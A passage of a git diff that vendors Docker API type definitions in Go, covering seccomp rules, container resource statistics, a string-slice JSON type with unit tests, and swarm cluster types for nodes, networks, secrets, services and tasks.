`json:"index"` + Value uint64 `json:"value"` + ValueTwo uint64 `json:"valueTwo"` + Op Operator `json:"op"` +} + +// Filter is used to conditionally apply Seccomp rules +type Filter struct { + Caps []string `json:"caps,omitempty"` + Arches []string `json:"arches,omitempty"` +} + +// Syscall is used to match a group of syscalls in Seccomp +type Syscall struct { + Name string `json:"name,omitempty"` + Names []string `json:"names,omitempty"` + Action Action `json:"action"` + Args []*Arg `json:"args"` + Comment string `json:"comment"` + Includes Filter `json:"includes"` + Excludes Filter `json:"excludes"` +} diff --git a/vendor/github.com/docker/docker/api/types/service_update_response.go b/vendor/github.com/docker/docker/api/types/service_update_response.go new file mode 100644 index 0000000000..74ea64b1bb --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/service_update_response.go @@ -0,0 +1,12 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// ServiceUpdateResponse service update response +// swagger:model ServiceUpdateResponse +type ServiceUpdateResponse struct { + + // Optional warning messages + Warnings []string `json:"Warnings"` +} diff --git a/vendor/github.com/docker/docker/api/types/stats.go b/vendor/github.com/docker/docker/api/types/stats.go new file mode 100644 index 0000000000..9bf1928b8c --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/stats.go @@ -0,0 +1,178 @@ +// Package types is used for API stability in the types and response to the +// consumers of the API stats endpoint. +package types + +import "time" + +// ThrottlingData stores CPU throttling stats of one running container. +// Not used on Windows. +type ThrottlingData struct { + // Number of periods with throttling active + Periods uint64 `json:"periods"` + // Number of periods when the container hits its throttling limit. 
+ ThrottledPeriods uint64 `json:"throttled_periods"` + // Aggregate time the container was throttled for in nanoseconds. + ThrottledTime uint64 `json:"throttled_time"` +} + +// CPUUsage stores All CPU stats aggregated since container inception. +type CPUUsage struct { + // Total CPU time consumed. + // Units: nanoseconds (Linux) + // Units: 100's of nanoseconds (Windows) + TotalUsage uint64 `json:"total_usage"` + + // Total CPU time consumed per core (Linux). Not used on Windows. + // Units: nanoseconds. + PercpuUsage []uint64 `json:"percpu_usage,omitempty"` + + // Time spent by tasks of the cgroup in kernel mode (Linux). + // Time spent by all container processes in kernel mode (Windows). + // Units: nanoseconds (Linux). + // Units: 100's of nanoseconds (Windows). Not populated for Hyper-V Containers. + UsageInKernelmode uint64 `json:"usage_in_kernelmode"` + + // Time spent by tasks of the cgroup in user mode (Linux). + // Time spent by all container processes in user mode (Windows). + // Units: nanoseconds (Linux). + // Units: 100's of nanoseconds (Windows). Not populated for Hyper-V Containers + UsageInUsermode uint64 `json:"usage_in_usermode"` +} + +// CPUStats aggregates and wraps all CPU related info of container +type CPUStats struct { + // CPU Usage. Linux and Windows. + CPUUsage CPUUsage `json:"cpu_usage"` + + // System Usage. Linux only. + SystemUsage uint64 `json:"system_cpu_usage,omitempty"` + + // Throttling Data. Linux only. + ThrottlingData ThrottlingData `json:"throttling_data,omitempty"` +} + +// MemoryStats aggregates all memory stats since container inception on Linux. +// Windows returns stats for commit and private working set only. +type MemoryStats struct { + // Linux Memory Stats + + // current res_counter usage for memory + Usage uint64 `json:"usage,omitempty"` + // maximum usage ever recorded. + MaxUsage uint64 `json:"max_usage,omitempty"` + // TODO(vishh): Export these as stronger types. + // all the stats exported via memory.stat. 
+ Stats map[string]uint64 `json:"stats,omitempty"` + // number of times memory usage hits limits. + Failcnt uint64 `json:"failcnt,omitempty"` + Limit uint64 `json:"limit,omitempty"` + + // Windows Memory Stats + // See https://technet.microsoft.com/en-us/magazine/ff382715.aspx + + // committed bytes + Commit uint64 `json:"commitbytes,omitempty"` + // peak committed bytes + CommitPeak uint64 `json:"commitpeakbytes,omitempty"` + // private working set + PrivateWorkingSet uint64 `json:"privateworkingset,omitempty"` +} + +// BlkioStatEntry is one small entity to store a piece of Blkio stats +// Not used on Windows. +type BlkioStatEntry struct { + Major uint64 `json:"major"` + Minor uint64 `json:"minor"` + Op string `json:"op"` + Value uint64 `json:"value"` +} + +// BlkioStats stores All IO service stats for data read and write. +// This is a Linux specific structure as the differences between expressing +// block I/O on Windows and Linux are sufficiently significant to make +// little sense attempting to morph into a combined structure. +type BlkioStats struct { + // number of bytes transferred to and from the block device + IoServiceBytesRecursive []BlkioStatEntry `json:"io_service_bytes_recursive"` + IoServicedRecursive []BlkioStatEntry `json:"io_serviced_recursive"` + IoQueuedRecursive []BlkioStatEntry `json:"io_queue_recursive"` + IoServiceTimeRecursive []BlkioStatEntry `json:"io_service_time_recursive"` + IoWaitTimeRecursive []BlkioStatEntry `json:"io_wait_time_recursive"` + IoMergedRecursive []BlkioStatEntry `json:"io_merged_recursive"` + IoTimeRecursive []BlkioStatEntry `json:"io_time_recursive"` + SectorsRecursive []BlkioStatEntry `json:"sectors_recursive"` +} + +// StorageStats is the disk I/O stats for read/write on Windows. 
+type StorageStats struct { + ReadCountNormalized uint64 `json:"read_count_normalized,omitempty"` + ReadSizeBytes uint64 `json:"read_size_bytes,omitempty"` + WriteCountNormalized uint64 `json:"write_count_normalized,omitempty"` + WriteSizeBytes uint64 `json:"write_size_bytes,omitempty"` +} + +// NetworkStats aggregates the network stats of one container +type NetworkStats struct { + // Bytes received. Windows and Linux. + RxBytes uint64 `json:"rx_bytes"` + // Packets received. Windows and Linux. + RxPackets uint64 `json:"rx_packets"` + // Received errors. Not used on Windows. Note that we dont `omitempty` this + // field as it is expected in the >=v1.21 API stats structure. + RxErrors uint64 `json:"rx_errors"` + // Incoming packets dropped. Windows and Linux. + RxDropped uint64 `json:"rx_dropped"` + // Bytes sent. Windows and Linux. + TxBytes uint64 `json:"tx_bytes"` + // Packets sent. Windows and Linux. + TxPackets uint64 `json:"tx_packets"` + // Sent errors. Not used on Windows. Note that we dont `omitempty` this + // field as it is expected in the >=v1.21 API stats structure. + TxErrors uint64 `json:"tx_errors"` + // Outgoing packets dropped. Windows and Linux. + TxDropped uint64 `json:"tx_dropped"` + // Endpoint ID. Not used on Linux. + EndpointID string `json:"endpoint_id,omitempty"` + // Instance ID. Not used on Linux. + InstanceID string `json:"instance_id,omitempty"` +} + +// PidsStats contains the stats of a container's pids +type PidsStats struct { + // Current is the number of pids in the cgroup + Current uint64 `json:"current,omitempty"` + // Limit is the hard limit on the number of pids in the cgroup. + // A "Limit" of 0 means that there is no limit. + Limit uint64 `json:"limit,omitempty"` +} + +// Stats is Ultimate struct aggregating all types of stats of one container +type Stats struct { + // Common stats + Read time.Time `json:"read"` + PreRead time.Time `json:"preread"` + + // Linux specific stats, not populated on Windows. 
+ PidsStats PidsStats `json:"pids_stats,omitempty"` + BlkioStats BlkioStats `json:"blkio_stats,omitempty"` + + // Windows specific stats, not populated on Linux. + NumProcs uint32 `json:"num_procs"` + StorageStats StorageStats `json:"storage_stats,omitempty"` + + // Shared stats + CPUStats CPUStats `json:"cpu_stats,omitempty"` + PreCPUStats CPUStats `json:"precpu_stats,omitempty"` // "Pre"="Previous" + MemoryStats MemoryStats `json:"memory_stats,omitempty"` +} + +// StatsJSON is newly used Networks +type StatsJSON struct { + Stats + + Name string `json:"name,omitempty"` + ID string `json:"id,omitempty"` + + // Networks request version >=1.21 + Networks map[string]NetworkStats `json:"networks,omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/strslice/strslice.go b/vendor/github.com/docker/docker/api/types/strslice/strslice.go new file mode 100644 index 0000000000..bad493fb89 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/strslice/strslice.go @@ -0,0 +1,30 @@ +package strslice + +import "encoding/json" + +// StrSlice represents a string or an array of strings. +// We need to override the json decoder to accept both options. +type StrSlice []string + +// UnmarshalJSON decodes the byte slice whether it's a string or an array of +// strings. This method is needed to implement json.Unmarshaler. +func (e *StrSlice) UnmarshalJSON(b []byte) error { + if len(b) == 0 { + // With no input, we preserve the existing value by returning nil and + // leaving the target alone. This allows defining default values for + // the type. 
+ return nil + } + + p := make([]string, 0, 1) + if err := json.Unmarshal(b, &p); err != nil { + var s string + if err := json.Unmarshal(b, &s); err != nil { + return err + } + p = append(p, s) + } + + *e = p + return nil +} diff --git a/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go b/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go new file mode 100644 index 0000000000..1163b3652c --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go @@ -0,0 +1,86 @@ +package strslice + +import ( + "encoding/json" + "reflect" + "testing" +) + +func TestStrSliceMarshalJSON(t *testing.T) { + for _, testcase := range []struct { + input StrSlice + expected string + }{ + // MADNESS(stevvooe): No clue why nil would be "" but empty would be + // "null". Had to make a change here that may affect compatibility. + {input: nil, expected: "null"}, + {StrSlice{}, "[]"}, + {StrSlice{"/bin/sh", "-c", "echo"}, `["/bin/sh","-c","echo"]`}, + } { + data, err := json.Marshal(testcase.input) + if err != nil { + t.Fatal(err) + } + if string(data) != testcase.expected { + t.Fatalf("%#v: expected %v, got %v", testcase.input, testcase.expected, string(data)) + } + } +} + +func TestStrSliceUnmarshalJSON(t *testing.T) { + parts := map[string][]string{ + "": {"default", "values"}, + "[]": {}, + `["/bin/sh","-c","echo"]`: {"/bin/sh", "-c", "echo"}, + } + for json, expectedParts := range parts { + strs := StrSlice{"default", "values"} + if err := strs.UnmarshalJSON([]byte(json)); err != nil { + t.Fatal(err) + } + + actualParts := []string(strs) + if !reflect.DeepEqual(actualParts, expectedParts) { + t.Fatalf("%#v: expected %v, got %v", json, expectedParts, actualParts) + } + + } +} + +func TestStrSliceUnmarshalString(t *testing.T) { + var e StrSlice + echo, err := json.Marshal("echo") + if err != nil { + t.Fatal(err) + } + if err := json.Unmarshal(echo, &e); err != nil { + t.Fatal(err) + } + + if len(e) != 1 { + t.Fatalf("expected 1 
element after unmarshal: %q", e) + } + + if e[0] != "echo" { + t.Fatalf("expected `echo`, got: %q", e[0]) + } +} + +func TestStrSliceUnmarshalSlice(t *testing.T) { + var e StrSlice + echo, err := json.Marshal([]string{"echo"}) + if err != nil { + t.Fatal(err) + } + if err := json.Unmarshal(echo, &e); err != nil { + t.Fatal(err) + } + + if len(e) != 1 { + t.Fatalf("expected 1 element after unmarshal: %q", e) + } + + if e[0] != "echo" { + t.Fatalf("expected `echo`, got: %q", e[0]) + } +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/common.go b/vendor/github.com/docker/docker/api/types/swarm/common.go new file mode 100644 index 0000000000..64a648bad1 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/common.go @@ -0,0 +1,27 @@ +package swarm + +import "time" + +// Version represents the internal object version. +type Version struct { + Index uint64 `json:",omitempty"` +} + +// Meta is a base object inherited by most of the other once. +type Meta struct { + Version Version `json:",omitempty"` + CreatedAt time.Time `json:",omitempty"` + UpdatedAt time.Time `json:",omitempty"` +} + +// Annotations represents how to describe an object. +type Annotations struct { + Name string `json:",omitempty"` + Labels map[string]string `json:",omitempty"` +} + +// Driver represents a driver (network, logging). 
+type Driver struct { + Name string `json:",omitempty"` + Options map[string]string `json:",omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/container.go b/vendor/github.com/docker/docker/api/types/swarm/container.go new file mode 100644 index 0000000000..4ab476ccc3 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/container.go @@ -0,0 +1,46 @@ +package swarm + +import ( + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" +) + +// DNSConfig specifies DNS related configurations in resolver configuration file (resolv.conf) +// Detailed documentation is available in: +// http://man7.org/linux/man-pages/man5/resolv.conf.5.html +// `nameserver`, `search`, `options` have been supported. +// TODO: `domain` is not supported yet. +type DNSConfig struct { + // Nameservers specifies the IP addresses of the name servers + Nameservers []string `json:",omitempty"` + // Search specifies the search list for host-name lookup + Search []string `json:",omitempty"` + // Options allows certain internal resolver variables to be modified + Options []string `json:",omitempty"` +} + +// ContainerSpec represents the spec of a container. +type ContainerSpec struct { + Image string `json:",omitempty"` + Labels map[string]string `json:",omitempty"` + Command []string `json:",omitempty"` + Args []string `json:",omitempty"` + Hostname string `json:",omitempty"` + Env []string `json:",omitempty"` + Dir string `json:",omitempty"` + User string `json:",omitempty"` + Groups []string `json:",omitempty"` + TTY bool `json:",omitempty"` + OpenStdin bool `json:",omitempty"` + Mounts []mount.Mount `json:",omitempty"` + StopGracePeriod *time.Duration `json:",omitempty"` + Healthcheck *container.HealthConfig `json:",omitempty"` + // The format of extra hosts on swarmkit is specified in: + // http://man7.org/linux/man-pages/man5/hosts.5.html + // IP_address canonical_hostname [aliases...] 
+ Hosts []string `json:",omitempty"` + DNSConfig *DNSConfig `json:",omitempty"` + Secrets []*SecretReference `json:",omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/network.go b/vendor/github.com/docker/docker/api/types/swarm/network.go new file mode 100644 index 0000000000..5a5e11bdba --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/network.go @@ -0,0 +1,111 @@ +package swarm + +// Endpoint represents an endpoint. +type Endpoint struct { + Spec EndpointSpec `json:",omitempty"` + Ports []PortConfig `json:",omitempty"` + VirtualIPs []EndpointVirtualIP `json:",omitempty"` +} + +// EndpointSpec represents the spec of an endpoint. +type EndpointSpec struct { + Mode ResolutionMode `json:",omitempty"` + Ports []PortConfig `json:",omitempty"` +} + +// ResolutionMode represents a resolution mode. +type ResolutionMode string + +const ( + // ResolutionModeVIP VIP + ResolutionModeVIP ResolutionMode = "vip" + // ResolutionModeDNSRR DNSRR + ResolutionModeDNSRR ResolutionMode = "dnsrr" +) + +// PortConfig represents the config of a port. +type PortConfig struct { + Name string `json:",omitempty"` + Protocol PortConfigProtocol `json:",omitempty"` + // TargetPort is the port inside the container + TargetPort uint32 `json:",omitempty"` + // PublishedPort is the port on the swarm hosts + PublishedPort uint32 `json:",omitempty"` + // PublishMode is the mode in which port is published + PublishMode PortConfigPublishMode `json:",omitempty"` +} + +// PortConfigPublishMode represents the mode in which the port is to +// be published. +type PortConfigPublishMode string + +const ( + // PortConfigPublishModeIngress is used for ports published + // for ingress load balancing using routing mesh. + PortConfigPublishModeIngress PortConfigPublishMode = "ingress" + // PortConfigPublishModeHost is used for ports published + // for direct host level access on the host where the task is running. 
+ PortConfigPublishModeHost PortConfigPublishMode = "host" +) + +// PortConfigProtocol represents the protocol of a port. +type PortConfigProtocol string + +const ( + // TODO(stevvooe): These should be used generally, not just for PortConfig. + + // PortConfigProtocolTCP TCP + PortConfigProtocolTCP PortConfigProtocol = "tcp" + // PortConfigProtocolUDP UDP + PortConfigProtocolUDP PortConfigProtocol = "udp" +) + +// EndpointVirtualIP represents the virtual ip of a port. +type EndpointVirtualIP struct { + NetworkID string `json:",omitempty"` + Addr string `json:",omitempty"` +} + +// Network represents a network. +type Network struct { + ID string + Meta + Spec NetworkSpec `json:",omitempty"` + DriverState Driver `json:",omitempty"` + IPAMOptions *IPAMOptions `json:",omitempty"` +} + +// NetworkSpec represents the spec of a network. +type NetworkSpec struct { + Annotations + DriverConfiguration *Driver `json:",omitempty"` + IPv6Enabled bool `json:",omitempty"` + Internal bool `json:",omitempty"` + Attachable bool `json:",omitempty"` + IPAMOptions *IPAMOptions `json:",omitempty"` +} + +// NetworkAttachmentConfig represents the configuration of a network attachment. +type NetworkAttachmentConfig struct { + Target string `json:",omitempty"` + Aliases []string `json:",omitempty"` +} + +// NetworkAttachment represents a network attachment. +type NetworkAttachment struct { + Network Network `json:",omitempty"` + Addresses []string `json:",omitempty"` +} + +// IPAMOptions represents ipam options. +type IPAMOptions struct { + Driver Driver `json:",omitempty"` + Configs []IPAMConfig `json:",omitempty"` +} + +// IPAMConfig represents ipam configuration. 
+type IPAMConfig struct { + Subnet string `json:",omitempty"` + Range string `json:",omitempty"` + Gateway string `json:",omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/node.go b/vendor/github.com/docker/docker/api/types/swarm/node.go new file mode 100644 index 0000000000..379e17a779 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/node.go @@ -0,0 +1,114 @@ +package swarm + +// Node represents a node. +type Node struct { + ID string + Meta + // Spec defines the desired state of the node as specified by the user. + // The system will honor this and will *never* modify it. + Spec NodeSpec `json:",omitempty"` + // Description encapsulates the properties of the Node as reported by the + // agent. + Description NodeDescription `json:",omitempty"` + // Status provides the current status of the node, as seen by the manager. + Status NodeStatus `json:",omitempty"` + // ManagerStatus provides the current status of the node's manager + // component, if the node is a manager. + ManagerStatus *ManagerStatus `json:",omitempty"` +} + +// NodeSpec represents the spec of a node. +type NodeSpec struct { + Annotations + Role NodeRole `json:",omitempty"` + Availability NodeAvailability `json:",omitempty"` +} + +// NodeRole represents the role of a node. +type NodeRole string + +const ( + // NodeRoleWorker WORKER + NodeRoleWorker NodeRole = "worker" + // NodeRoleManager MANAGER + NodeRoleManager NodeRole = "manager" +) + +// NodeAvailability represents the availability of a node. +type NodeAvailability string + +const ( + // NodeAvailabilityActive ACTIVE + NodeAvailabilityActive NodeAvailability = "active" + // NodeAvailabilityPause PAUSE + NodeAvailabilityPause NodeAvailability = "pause" + // NodeAvailabilityDrain DRAIN + NodeAvailabilityDrain NodeAvailability = "drain" +) + +// NodeDescription represents the description of a node. 
+type NodeDescription struct { + Hostname string `json:",omitempty"` + Platform Platform `json:",omitempty"` + Resources Resources `json:",omitempty"` + Engine EngineDescription `json:",omitempty"` +} + +// Platform represents the platform (Arch/OS). +type Platform struct { + Architecture string `json:",omitempty"` + OS string `json:",omitempty"` +} + +// EngineDescription represents the description of an engine. +type EngineDescription struct { + EngineVersion string `json:",omitempty"` + Labels map[string]string `json:",omitempty"` + Plugins []PluginDescription `json:",omitempty"` +} + +// PluginDescription represents the description of an engine plugin. +type PluginDescription struct { + Type string `json:",omitempty"` + Name string `json:",omitempty"` +} + +// NodeStatus represents the status of a node. +type NodeStatus struct { + State NodeState `json:",omitempty"` + Message string `json:",omitempty"` + Addr string `json:",omitempty"` +} + +// Reachability represents the reachability of a node. +type Reachability string + +const ( + // ReachabilityUnknown UNKNOWN + ReachabilityUnknown Reachability = "unknown" + // ReachabilityUnreachable UNREACHABLE + ReachabilityUnreachable Reachability = "unreachable" + // ReachabilityReachable REACHABLE + ReachabilityReachable Reachability = "reachable" +) + +// ManagerStatus represents the status of a manager. +type ManagerStatus struct { + Leader bool `json:",omitempty"` + Reachability Reachability `json:",omitempty"` + Addr string `json:",omitempty"` +} + +// NodeState represents the state of a node. 
+type NodeState string + +const ( + // NodeStateUnknown UNKNOWN + NodeStateUnknown NodeState = "unknown" + // NodeStateDown DOWN + NodeStateDown NodeState = "down" + // NodeStateReady READY + NodeStateReady NodeState = "ready" + // NodeStateDisconnected DISCONNECTED + NodeStateDisconnected NodeState = "disconnected" +) diff --git a/vendor/github.com/docker/docker/api/types/swarm/secret.go b/vendor/github.com/docker/docker/api/types/swarm/secret.go new file mode 100644 index 0000000000..fdb2388888 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/secret.go @@ -0,0 +1,31 @@ +package swarm + +import "os" + +// Secret represents a secret. +type Secret struct { + ID string + Meta + Spec SecretSpec +} + +// SecretSpec represents a secret specification from a secret in swarm +type SecretSpec struct { + Annotations + Data []byte `json:",omitempty"` +} + +// SecretReferenceFileTarget is a file target in a secret reference +type SecretReferenceFileTarget struct { + Name string + UID string + GID string + Mode os.FileMode +} + +// SecretReference is a reference to a secret in swarm +type SecretReference struct { + File *SecretReferenceFileTarget + SecretID string + SecretName string +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/service.go b/vendor/github.com/docker/docker/api/types/swarm/service.go new file mode 100644 index 0000000000..2cf2642c1f --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/service.go @@ -0,0 +1,105 @@ +package swarm + +import "time" + +// Service represents a service. +type Service struct { + ID string + Meta + Spec ServiceSpec `json:",omitempty"` + PreviousSpec *ServiceSpec `json:",omitempty"` + Endpoint Endpoint `json:",omitempty"` + UpdateStatus UpdateStatus `json:",omitempty"` +} + +// ServiceSpec represents the spec of a service. +type ServiceSpec struct { + Annotations + + // TaskTemplate defines how the service should construct new tasks when + // orchestrating this service. 
+ TaskTemplate TaskSpec `json:",omitempty"` + Mode ServiceMode `json:",omitempty"` + UpdateConfig *UpdateConfig `json:",omitempty"` + + // Networks field in ServiceSpec is deprecated. The + // same field in TaskSpec should be used instead. + // This field will be removed in a future release. + Networks []NetworkAttachmentConfig `json:",omitempty"` + EndpointSpec *EndpointSpec `json:",omitempty"` +} + +// ServiceMode represents the mode of a service. +type ServiceMode struct { + Replicated *ReplicatedService `json:",omitempty"` + Global *GlobalService `json:",omitempty"` +} + +// UpdateState is the state of a service update. +type UpdateState string + +const ( + // UpdateStateUpdating is the updating state. + UpdateStateUpdating UpdateState = "updating" + // UpdateStatePaused is the paused state. + UpdateStatePaused UpdateState = "paused" + // UpdateStateCompleted is the completed state. + UpdateStateCompleted UpdateState = "completed" +) + +// UpdateStatus reports the status of a service update. +type UpdateStatus struct { + State UpdateState `json:",omitempty"` + StartedAt time.Time `json:",omitempty"` + CompletedAt time.Time `json:",omitempty"` + Message string `json:",omitempty"` +} + +// ReplicatedService is a kind of ServiceMode. +type ReplicatedService struct { + Replicas *uint64 `json:",omitempty"` +} + +// GlobalService is a kind of ServiceMode. +type GlobalService struct{} + +const ( + // UpdateFailureActionPause PAUSE + UpdateFailureActionPause = "pause" + // UpdateFailureActionContinue CONTINUE + UpdateFailureActionContinue = "continue" +) + +// UpdateConfig represents the update configuration. +type UpdateConfig struct { + // Maximum number of tasks to be updated in one iteration. + // 0 means unlimited parallelism. + Parallelism uint64 + + // Amount of time between updates. + Delay time.Duration `json:",omitempty"` + + // FailureAction is the action to take when an update failures. 
+ FailureAction string `json:",omitempty"` + + // Monitor indicates how long to monitor a task for failure after it is + // created. If the task fails by ending up in one of the states + // REJECTED, COMPLETED, or FAILED, within Monitor from its creation, + // this counts as a failure. If it fails after Monitor, it does not + // count as a failure. If Monitor is unspecified, a default value will + // be used. + Monitor time.Duration `json:",omitempty"` + + // MaxFailureRatio is the fraction of tasks that may fail during + // an update before the failure action is invoked. Any task created by + // the current update which ends up in one of the states REJECTED, + // COMPLETED or FAILED within Monitor from its creation counts as a + // failure. The number of failures is divided by the number of tasks + // being updated, and if this fraction is greater than + // MaxFailureRatio, the failure action is invoked. + // + // If the failure action is CONTINUE, there is no effect. + // If the failure action is PAUSE, no more tasks will be updated until + // another update is started. + MaxFailureRatio float32 +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/swarm.go b/vendor/github.com/docker/docker/api/types/swarm/swarm.go new file mode 100644 index 0000000000..0b42219696 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/swarm.go @@ -0,0 +1,197 @@ +package swarm + +import "time" + +// ClusterInfo represents info about the cluster for outputing in "info" +// it contains the same information as "Swarm", but without the JoinTokens +type ClusterInfo struct { + ID string + Meta + Spec Spec +} + +// Swarm represents a swarm. +type Swarm struct { + ClusterInfo + JoinTokens JoinTokens +} + +// JoinTokens contains the tokens workers and managers need to join the swarm. +type JoinTokens struct { + // Worker is the join token workers may use to join the swarm. + Worker string + // Manager is the join token managers may use to join the swarm. 
+ Manager string +} + +// Spec represents the spec of a swarm. +type Spec struct { + Annotations + + Orchestration OrchestrationConfig `json:",omitempty"` + Raft RaftConfig `json:",omitempty"` + Dispatcher DispatcherConfig `json:",omitempty"` + CAConfig CAConfig `json:",omitempty"` + TaskDefaults TaskDefaults `json:",omitempty"` + EncryptionConfig EncryptionConfig `json:",omitempty"` +} + +// OrchestrationConfig represents orchestration configuration. +type OrchestrationConfig struct { + // TaskHistoryRetentionLimit is the number of historic tasks to keep per instance or + // node. If negative, never remove completed or failed tasks. + TaskHistoryRetentionLimit *int64 `json:",omitempty"` +} + +// TaskDefaults parameterizes cluster-level task creation with default values. +type TaskDefaults struct { + // LogDriver selects the log driver to use for tasks created in the + // orchestrator if unspecified by a service. + // + // Updating this value will only have an affect on new tasks. Old tasks + // will continue use their previously configured log driver until + // recreated. + LogDriver *Driver `json:",omitempty"` +} + +// EncryptionConfig controls at-rest encryption of data and keys. +type EncryptionConfig struct { + // AutoLockManagers specifies whether or not managers TLS keys and raft data + // should be encrypted at rest in such a way that they must be unlocked + // before the manager node starts up again. + AutoLockManagers bool +} + +// RaftConfig represents raft configuration. +type RaftConfig struct { + // SnapshotInterval is the number of log entries between snapshots. + SnapshotInterval uint64 `json:",omitempty"` + + // KeepOldSnapshots is the number of snapshots to keep beyond the + // current snapshot. + KeepOldSnapshots *uint64 `json:",omitempty"` + + // LogEntriesForSlowFollowers is the number of log entries to keep + // around to sync up slow followers after a snapshot is created. 
+ LogEntriesForSlowFollowers uint64 `json:",omitempty"` + + // ElectionTick is the number of ticks that a follower will wait for a message + // from the leader before becoming a candidate and starting an election. + // ElectionTick must be greater than HeartbeatTick. + // + // A tick currently defaults to one second, so these translate directly to + // seconds currently, but this is NOT guaranteed. + ElectionTick int + + // HeartbeatTick is the number of ticks between heartbeats. Every + // HeartbeatTick ticks, the leader will send a heartbeat to the + // followers. + // + // A tick currently defaults to one second, so these translate directly to + // seconds currently, but this is NOT guaranteed. + HeartbeatTick int +} + +// DispatcherConfig represents dispatcher configuration. +type DispatcherConfig struct { + // HeartbeatPeriod defines how often agent should send heartbeats to + // dispatcher. + HeartbeatPeriod time.Duration `json:",omitempty"` +} + +// CAConfig represents CA configuration. +type CAConfig struct { + // NodeCertExpiry is the duration certificates should be issued for + NodeCertExpiry time.Duration `json:",omitempty"` + + // ExternalCAs is a list of CAs to which a manager node will make + // certificate signing requests for node certificates. + ExternalCAs []*ExternalCA `json:",omitempty"` +} + +// ExternalCAProtocol represents type of external CA. +type ExternalCAProtocol string + +// ExternalCAProtocolCFSSL CFSSL +const ExternalCAProtocolCFSSL ExternalCAProtocol = "cfssl" + +// ExternalCA defines external CA to be used by the cluster. +type ExternalCA struct { + // Protocol is the protocol used by this external CA. + Protocol ExternalCAProtocol + + // URL is the URL where the external CA can be reached. + URL string + + // Options is a set of additional key/value pairs whose interpretation + // depends on the specified CA type. + Options map[string]string `json:",omitempty"` +} + +// InitRequest is the request used to init a swarm. 
+type InitRequest struct { + ListenAddr string + AdvertiseAddr string + ForceNewCluster bool + Spec Spec + AutoLockManagers bool +} + +// JoinRequest is the request used to join a swarm. +type JoinRequest struct { + ListenAddr string + AdvertiseAddr string + RemoteAddrs []string + JoinToken string // accept by secret +} + +// UnlockRequest is the request used to unlock a swarm. +type UnlockRequest struct { + // UnlockKey is the unlock key in ASCII-armored format. + UnlockKey string +} + +// LocalNodeState represents the state of the local node. +type LocalNodeState string + +const ( + // LocalNodeStateInactive INACTIVE + LocalNodeStateInactive LocalNodeState = "inactive" + // LocalNodeStatePending PENDING + LocalNodeStatePending LocalNodeState = "pending" + // LocalNodeStateActive ACTIVE + LocalNodeStateActive LocalNodeState = "active" + // LocalNodeStateError ERROR + LocalNodeStateError LocalNodeState = "error" + // LocalNodeStateLocked LOCKED + LocalNodeStateLocked LocalNodeState = "locked" +) + +// Info represents generic information about swarm. +type Info struct { + NodeID string + NodeAddr string + + LocalNodeState LocalNodeState + ControlAvailable bool + Error string + + RemoteManagers []Peer + Nodes int + Managers int + + Cluster ClusterInfo +} + +// Peer represents a peer. +type Peer struct { + NodeID string + Addr string +} + +// UpdateFlags contains flags for SwarmUpdate. +type UpdateFlags struct { + RotateWorkerToken bool + RotateManagerToken bool + RotateManagerUnlockKey bool +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/task.go b/vendor/github.com/docker/docker/api/types/swarm/task.go new file mode 100644 index 0000000000..ace12cc89f --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/task.go @@ -0,0 +1,128 @@ +package swarm + +import "time" + +// TaskState represents the state of a task. 
+type TaskState string + +const ( + // TaskStateNew NEW + TaskStateNew TaskState = "new" + // TaskStateAllocated ALLOCATED + TaskStateAllocated TaskState = "allocated" + // TaskStatePending PENDING + TaskStatePending TaskState = "pending" + // TaskStateAssigned ASSIGNED + TaskStateAssigned TaskState = "assigned" + // TaskStateAccepted ACCEPTED + TaskStateAccepted TaskState = "accepted" + // TaskStatePreparing PREPARING + TaskStatePreparing TaskState = "preparing" + // TaskStateReady READY + TaskStateReady TaskState = "ready" + // TaskStateStarting STARTING + TaskStateStarting TaskState = "starting" + // TaskStateRunning RUNNING + TaskStateRunning TaskState = "running" + // TaskStateComplete COMPLETE + TaskStateComplete TaskState = "complete" + // TaskStateShutdown SHUTDOWN + TaskStateShutdown TaskState = "shutdown" + // TaskStateFailed FAILED + TaskStateFailed TaskState = "failed" + // TaskStateRejected REJECTED + TaskStateRejected TaskState = "rejected" +) + +// Task represents a task. +type Task struct { + ID string + Meta + Annotations + + Spec TaskSpec `json:",omitempty"` + ServiceID string `json:",omitempty"` + Slot int `json:",omitempty"` + NodeID string `json:",omitempty"` + Status TaskStatus `json:",omitempty"` + DesiredState TaskState `json:",omitempty"` + NetworksAttachments []NetworkAttachment `json:",omitempty"` +} + +// TaskSpec represents the spec of a task. +type TaskSpec struct { + ContainerSpec ContainerSpec `json:",omitempty"` + Resources *ResourceRequirements `json:",omitempty"` + RestartPolicy *RestartPolicy `json:",omitempty"` + Placement *Placement `json:",omitempty"` + Networks []NetworkAttachmentConfig `json:",omitempty"` + + // LogDriver specifies the LogDriver to use for tasks created from this + // spec. If not present, the one on cluster default on swarm.Spec will be + // used, finally falling back to the engine default if not specified. 
